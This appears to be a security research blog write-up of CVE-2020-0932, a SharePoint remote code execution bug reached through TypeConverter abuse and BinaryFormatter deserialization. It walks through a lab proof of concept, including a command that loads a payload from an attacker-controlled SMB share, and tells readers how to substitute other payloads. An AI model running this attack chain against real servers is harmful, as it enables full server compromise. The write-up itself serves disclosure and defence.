# CVE-2020-0932: Remote Code Execution on Microsoft SharePoint Using
**Overview**
This vulnerability allows authenticated users to execute arbitrary code on a
SharePoint server. The code will execute in the context of the service account
of the SharePoint web application. For a successful attack, the attacker must
have the "Add or Customize Pages" permission on a SharePoint site or at least
on one page on the site. However, the default configuration of SharePoint
allows any authenticated user to create their own site with all the necessary
permissions.
**The Vulnerability**
The vulnerability exists because SharePoint does not restrict available Types
for properties when it parses the XML configuration of
[WebParts](https://support.office.com/en-us/article/using-web-parts-on-
sharepoint-pages-336e8e92-3e2d-4298-ae01-d404bbe751e0). For a property, an attacker may specify a string and a type name, and SharePoint will attempt to
convert the string using a `TypeConverter` corresponding to the specified
type. Some TypeConverters present in the SharePoint libraries can be used for
arbitrary code execution.
The entry point for this attack is the [WebPartPages](https://docs.microsoft.com/en-us/previous-
versions/office/developer/sharepoint-services/ms774788\(v=office.12\)) web service found at:
`http://<Site>/_vti_bin/WebPartPages.asmx`
Within the implementation of this web service there are several methods that
deal with parsing XML WebParts configuration, one of which is `RenderWebPartForEdit`. Note that [RenderWebPartForEdit](https://docs.microsoft.com/en-us/previous-
versions/office/developer/sharepoint-services/ms774825\(v=office.12\)) is exposed as a `WebMethod`, so that it can be invoked via an HTTP request:
data:image/s3,"s3://crabby-images/f3492/f349245ce5f34e5d7548526a6523301b1647802f" alt="Picture1.png"
data:image/s3,"s3://crabby-images/fd1b8/fd1b82e8de0dcbff5d8cd21eeb8fc238232213ec" alt="Picture2.png"
data:image/s3,"s3://crabby-images/bda7e/bda7e83fe020aabfc67aa370f3203b3b553cf14c" alt="Picture3.png"
The next method, `webPartImporter.CreateWebPart()`, is quite complicated, as
it implements parsers for 2 different versions of XML configurations, namely
WebPart/v2 (.dwp) files and WebPart/v3 (.webpart) files. Our focus is on the
parser for .webpart files. Also, a large portion of the code in this method is
dedicated to Type resolution and to validation of the WebPart itself. However,
this is not relevant to this attack and is not detailed here.
data:image/s3,"s3://crabby-images/ed61a/ed61a6e379666bebcaa08806af8cced69ba6c6fa" alt="Picture4.png"`.
View fullsize
data:image/s3,"s3://crabby-images/207d4/207d4d2df99004a2b19c53f6b7f0749d4417e69f" alt="Picture5.png"
This means all `property` elements will be processed by
`ImportWebPartFile.AddToProperyArrayLists()`:
data:image/s3,"s3://crabby-images/81bd7/81bd79cc163b281ada2e59ce300da87cd19dd206" alt="Picture6.png"
At this point, we control two crucial strings: `text` and
`xmlAttributeValue2`. `text` comes from the textual contents of the `property`
element, while `xmlAttributeValue2` comes from the element's `type` attribute.
The code shown above chooses a .NET `Type` on the basis of
`xmlAttributeValue2`, and then uses the `TypeConverter` of that `Type` to
convert `text` into a .NET object instance (`propValue`).
We must now investigate what types are available.
data:image/s3,"s3://crabby-images/0e2b9/0e2b9dd1198f8af465288a786c0e1f73a5d519dd" alt="Picture7.png"
Since there is no restriction, we can use any Type we want.
**Choosing a TypeConverter for RCE**
To gain arbitrary code execution, we will use the type
`System.Resources.ResXFileRef` and its `TypeConverter`,
`System.Resources.ResXFileRef.Converter`:
View fullsize
data:image/s3,"s3://crabby-images/f6d79/f6d79d8327407e21b460d3f6b5f1b0b74c50357e" alt="Picture8b.png"
This shows that `System.Resources.ResXFileRef.Converter` will take the string
we specify (`value`) and parse out two pieces of data. The first, shown here
as `array[0]`, will be interpreted as a path to a `.resources` resource file.
The second, `array[1]`, will be interpreted as the name of an arbitrary .NET
`Type`. The code shown above will instantiate the specified `Type`, passing a
single argument to the constructor. That argument will be a stream containing
the contents of the `.resources` file we specify. Since we are able to specify
a remote path to an attacker-controlled SMB server, we have complete control
over the stream contents.
**Choosing a Type We Can Instantiate With a Stream Argument**
The final challenge is to identify an available .NET type that has a
constructor with a single argument of type `Stream`, and that can be used for
arbitrary code execution. One possible solution is
`System.Resources.ResourceSet:`
View fullsize
data:image/s3,"s3://crabby-images/1ef5b/1ef5b31e50db1c3100225860c87fff80c0a0f5d8" alt="Picture9b.png"
Here, we are only interested in two lines: the first and the last. The first
line calls the constructor of `System.Resources.ResourceReader`:
View fullsize
data:image/s3,"s3://crabby-images/e82f1/e82f1248227d78ef7535536c841fd45652304e37" alt="Picture10b.png"
This is very promising, since it is taking the contents of the `Stream` and
feeding it to a `BinaryFormatter`. This could easily lead to arbitrary object
deserialization.
Looking back at the last line of the `System.Resources.ResourceSet`
constructor, and following the path of code execution down several levels of
calls:
data:image/s3,"s3://crabby-images/7ad71/7ad715bb075135e39aa57729f961a046701a0a60" alt="Alternate11.png"
data:image/s3,"s3://crabby-images/cac48/cac4823cf391fb1658671c223dededb8e1684c89" alt="Alternate12.png"
data:image/s3,"s3://crabby-images/886f7/886f7f61a1e302ed0c401e69ae13969977d85f61" alt="Alternate13.png"
This shows that the server will deserialize untrusted data, which allows us to
execute arbitrary code.
**Generating a .resources File**
To conduct this attack, we need a compiled `.resources` resource file
containing our payload. We can use Visual Studio to create the needed
`.resources` file. At compile time, Visual Studio uses the Resource File
Generator (Resgen.exe) to convert a `.resx` file to a binary resource
(`.resources`) file. To inject our payload, we can edit the `.resx` file and
replace the existing `data` node with the following:
View fullsize
data:image/s3,"s3://crabby-images/1374c/1374cc63bcde1598b2a57584d51eb5630dfa8930" alt="Alternate14.png"
Now we can save the `*.resx` file and compile the current project. Visual
Studio will place the compiled `*.resources` file in the `/obj` folder.
**Proof of Concept**
To demonstrate this exploit, we will use Microsoft SharePoint Server 2019
installed with all default options on a Windows Server 2019 Datacenter server.
We have set the computer name as sp2019.contoso.lab and made it a member of
the contoso.lab domain. The domain controller is on a separate virtual
machine. We added a couple of users, including **_user2_** as a regular
unprivileged user.
For the attacker system, we'll need any supported web browser. In the
following screenshots, we are using Mozilla Firefox 69.0.3. We'll also be
using our custom `SP_soap_RCE_PoC.exe` application to send the attack. You can
download all the necessary files to try this yourself [here](https://github.com/thezdi/PoC/tree/master/CVE-2020-0932). For different `BinaryFormatter` payloads, you will need
[YSoSerial.Net](https://github.com/pwntester/ysoserial.net). For this demonstration, the hardcoded payload in our PoC will suffice.
The next step is to set up a remote SMB server controlled by the attacker.
This can be any machine that can receive traffic from the target SharePoint
server. On this server, you will need to configure a shared folder that
requires no authentication. This can be a bit tricky, but the steps to do this
are detailed [here](http://nikolar.com/2015/03/10/creating-network-share-with-
anonymous-access/). For our demonstration, we're using Windows Server 2016
Standard with an IP address of 192.168.50.210. In addition to the steps
already listed to share a folder, we added Everyone, Guest, and ANONYMOUS
LOGON in the Security tab of the shared folder.
data:image/s3,"s3://crabby-images/c8fdb/c8fdbb70cc4acb8ac73487af432e01b51e668d72" alt="Picture11b.png"![Picture11b.png]()
Astute readers might wonder why the SharePoint server consents to accessing an
anonymous SMB share. For security reasons, the Windows SMB client normally
does not permit such an operation. This is a [mitigation
introduced](https://support.microsoft.com/en-us/help/4046019/guest-access-in-
smb2-disabled-by-default-in-windows-10-and-windows-ser) starting with version
1709 of Windows 10 and Windows Server 2016. The answer is that, for some
reason, the SharePoint installer turns this mitigation off via a registry
entry. In the registry key
`HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters`, it sets
the value `AllowInsecureGuestAuth` to `1`.
With the folder created and configured, we can place the payload for
BinaryFormatter in that location and proceed with the attack. For this
demonstration, we've named it `SP_soap_RCE_PoC.RCE_Resource.resources`.
Let's begin by visiting our SharePoint Server and authenticating as a regular
user. In this case it is **_user2_** :
View fullsize
data:image/s3,"s3://crabby-images/a7b39/a7b396e8f169dcecace3787220c2c7d33e23c2a4" alt="Picture12b.png"
Now we are logged in as an authenticated user:
View fullsize
data:image/s3,"s3://crabby-images/4a2dd/4a2ddabe22cc428bc53c02b0de3913451f28b197" alt="Picture13b.png"
Next, we create our own site so that we will be the owner and will have all
permissions. Note, if an attacker is not able to create their own site, they
can still try all existing sites and pages in an attempt to find at least one
where they have " **_Add_** or **_Customize_** " Pages permissions.
Click on "SharePoint" on the top panel:
View fullsize
data:image/s3,"s3://crabby-images/5993a/5993af2eb1d7cea5e204eca774cace47ea9d1173" alt="Picture14b.png"
Now click "\+ Create site" link:
View fullsize
data:image/s3,"s3://crabby-images/7d64e/7d64e427eef8c095cf73b403242987e035f5d028" alt="Picture15b.png"
For this demonstration, we choose **Team Site** , but it does not matter. Now
we need to pick a name for the new site. In this case, we use **siteofuser2**.
Also, we will need the BaseURL of the new site. We can see it on the form
shown below, above the green "Available" label. In this example, it is
`http://sp2019/sites/siteofuser2`:
View fullsize
data:image/s3,"s3://crabby-images/fcf07/fcf07ce00ca87d540bbaaf6e873c1ad34460eee9" alt="Picture16b.png"
Click " ** _Finish_** ", and the new site will be created:
View fullsize
data:image/s3,"s3://crabby-images/69535/6953526a7b9607d5eb93960bf2a9616fc7783989" alt="Picture17b.png"
Now let's go to the target SharePoint server and open the `C:\windows\temp`
folder.
View fullsize
data:image/s3,"s3://crabby-images/1f989/1f989b3086175c45d84fcb1d8ddc9a0531402bd2" alt="Picture18b.png"
We note there is no `Vuln_Server.txt` file yet. If successful, our PoC will
create this file. Next, we confirm our
`SP_soap_RCE_PoC.RCE_Resource.resources` file exists on the attacker-
controlled SMB server:
View fullsize
data:image/s3,"s3://crabby-images/1e616/1e616dd175ef7ec98a1f9aa4a050f82b353af4a4" alt="Picture19b.png"
Now let's go back to the "attacker" machine. We will use our custom
`SP_soap_RCE_PoC.exe` executable for the attack. We need to provide the
following information as arguments:
\-- **_BaseUrl_** of the target SharePoint Site. In this demonstration, it is
`http://sp2019/sites/siteofuser2/`
\-- **_UserName_** - In our case, this is `user2`
\-- **_Password_**
\-- **_Domain_**
\-- **_Remote Path_** to our payload file.
The command ends up looking like this:
`SP_soap_RCE_PoC.exe http://Sp2019/sites/siteofuser2/ user2 P@ssw0rd contoso
//192.168.50.210/share/SP_soap_RCE_PoC.RCE_Resource.resources`
View fullsize
data:image/s3,"s3://crabby-images/92b25/92b25ea0f7b1e0ba7c547c05e8dc99678bae164c" alt="Picture20b.png"
SharePoint does report an error that an unsafe type was specified, but the
attack is successful anyway. We can check the `Temp` folder on the target
server:
View fullsize
data:image/s3,"s3://crabby-images/3d09b/3d09bc073544fb5a223f144a12a5950fd8b23192" alt="Picture21b.png"
This shows how an attacker is able to execute arbitrary OS commands and
compromise the entire server. To execute other commands, you would need to
generate your own `*.resource` file. This can be done by opening the
`RCE_Resource.resx` file in any text editor and replacing the base64
`BinaryFormatter` payload with the desired one:
View fullsize
data:image/s3,"s3://crabby-images/f64b3/f64b3f03e75e2a40a58873421a1518e8e25b62d9" alt="Picture22b.png"
You can then save the file, open the project in Visual Studio and rebuild it.
The `SP_soap_RCE_PoC.RCE_Resource.resources` file with the new payload will be
in the `\SP_soap_RCE_PoC\SP_soap_RCE_PoC\obj\Release\` folder.
**Conclusion**
According to Microsoft, this vulnerability was fixed by "correcting how
SharePoint checks the source markup of application packages." Interestingly,
all six SharePoint bugs - including the Important-rated bugs - have the exact
same write-up. There's no indication from the vendor why some of these bugs
are rated Important while others are rated Critical. Because of this, we
recommend you treat all of the bugs as Critical. SharePoint bugs have proven
to be popular with attackers in the past. In 2019,
[CVE-2019-0604](https://www.zerodayinitiative.com/blog/2019/12/18/looking-
back-at-the-impact-of-cve-2019-0604-a-sharepoint-rce) ended up being used
extensively in the wild. Time will tell if this bug proves as popular with
criminals online.
We'll be back with other great submissions in the future. Until then, follow
the [team](https://twitter.com/thezdi) for the latest in exploit techniques
and security patches.
暂无评论